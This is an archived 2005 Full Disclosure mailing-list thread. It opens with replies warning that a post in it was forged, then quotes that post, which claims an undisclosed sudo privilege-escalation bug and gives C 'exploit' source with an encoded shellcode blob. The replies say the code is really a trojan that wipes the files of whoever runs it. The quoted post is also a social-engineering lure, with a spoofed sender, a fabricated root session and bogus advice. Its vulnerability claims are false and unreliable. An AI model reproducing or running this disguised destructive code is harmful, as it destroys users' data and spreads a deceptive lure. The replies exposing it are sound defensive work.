Full Disclosure mailing list archives
Re: Undisclosed Sudo Vulnerability ?
From: Jim Clausing <jclausing () isc sans org>
Date: Sat, 30 Jul 2005 23:06:54 -0400 (EDT)
Yeah and having talked to Joel, it was a pretty good forgery. I'm pretty sure he doesn't use Lotus for his e-mail client and I know he wouldn't be sending to the list from ee.fju.edu.tw (140.136.145.2).

--
Jim Clausing GCFA, GCIA, GCFW, GREM, CISSP, CCSA
GPG fingerprint = 30CE 6C98 E795 39FF 6E57 220B 342E E25C 852F 302B

On or about Sat, 30 Jul 2005, Kurt Seifried pontificated thusly:
This is a trojan that will nuke all the files owned by the user running it.

-Kurt

----- Original Message -----
From: "Esler, Joel - Contractor" <joel.esler () rcert-s army mil>
To: <full-disclosure () lists grok org uk>
Sent: Saturday, July 30, 2005 12:40 PM
Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?

About two weeks ago, our proprietary LIDS detected some suspicious shell activity on an internal .mil machine I am in charge of. Our server runs the latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled. Before shutting down the machine and reinstalling it from scratch, we installed the sebek module to monitor all shell activity. Based on the data we gathered, it seems the attacker gained root privileges using an undisclosed bug in the latest sudo.

$ uname -a
Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 GNU/Linux
$ sudo -V
Sudo version 1.6.8p9
$ ls -al /tmp/.phc
-rwsr-xr-x 1 root root 304873 Jul 05 03:45 /tmp/.phc

Here is an excerpt of a shell session we recorded:

<.........>
$ cat >blaat.uue<<'EH'
--------------------------------------------------------------------------------
EH
$ uudecode blaat.uue
$ cat sudoh.c
/*
 * off by one ebp overwrite in sudo prompt parsing func (bground mode only)
 *
 * "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard Johnson
 *
 * gcc -pipe -o sudoh sudoh.c ; ./sudoh
 *
 * happy deathday route
 *
 */
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>

#define SUDO_PROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246 /* generic */
#define NOPS_NUM 116 /* generic */

/*
 * Linux x86 non-interactive exec
 * {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
 */
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ =
    "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
    /* = "\xcc\xeb\xfe"; */

void fill (char *buff, int size, unsigned long val)
{
    unsigned long *ptr = (unsigned long *) buff;
    for (size /= sizeof (unsigned long); size > 0; size--)
        *ptr++ = val;
}

unsigned long get_sp (void)
{
    __asm__ ("lea esp, %eax");
}

char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
{
    int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen (shellcode);
    unsigned char *nops = alloca (nops_nums);
    unsigned char *rets = alloca (rets_nums);
    unsigned long ret = get_sp ();
    static char exp_buffer [8192];

    /* make sure sudo isatty() fails */
    close (0); close (1); close (2);

    fill (nops, (unsigned char) nops_nums, 0x90909090);
    fill (rets, (unsigned char) rets_nums, ret);

    /* be nice plz */
    if (size > sizeof (exp_buffer)) {
        fprintf (stderr, "buffer's t00 small..\n");
        return NULL;
    }

    snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
              SUDO_PROMPT, /* evilz prompt */
              nops, shellcode, rets); /* exploit buff */
    return exp_buffer;
}

int main(int argv, char *argc[])
{
    char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);

    /* thanks again T0dd :) */
    execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, "/bin/false", NULL);

    /* ok, shellroot should await you @ "HISTFILE=/dev/null /tmp/.phc -p" */
    return 0;
}
$ gcc -pipe -o sudoh sudoh.c
{standard input}: Assembler messages:
{standard input}:5: Warning: Ignoring changed section attributes for .text
$ ./sudoh
$ cat /bin/cat > blaat.uue; rm blaat.uue
$ cat /bin/cat > sudoh.c; rm sudoh.c
$ cat /bin/cat > sudoh; rm sudoh
$ HISTFILE=/dev/null /tmp/.phc -p
id
uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
<.........>

Todd Miller, the maintainer of Sudo, has been informed yesterday, and it is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.

J

Joel Esler, GCIA
joel.esler () rcert-s army mil
706-791-7165
DSN: 780-7165

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Undisclosed Sudo Vulnerability ? Esler, Joel - Contractor (Jul 30)
- Re: Undisclosed Sudo Vulnerability ? Kurt Seifried (Jul 30)
- Re: Undisclosed Sudo Vulnerability ? Kurt Seifried (Jul 30)
- Re: Undisclosed Sudo Vulnerability ? Jim Clausing (Jul 31)
- Re: re: Undisclosed Sudo Vulnerability ? Frank Knobbe (Jul 31)
- Re: re: Undisclosed Sudo Vulnerability ? Todd C. Miller (Jul 31)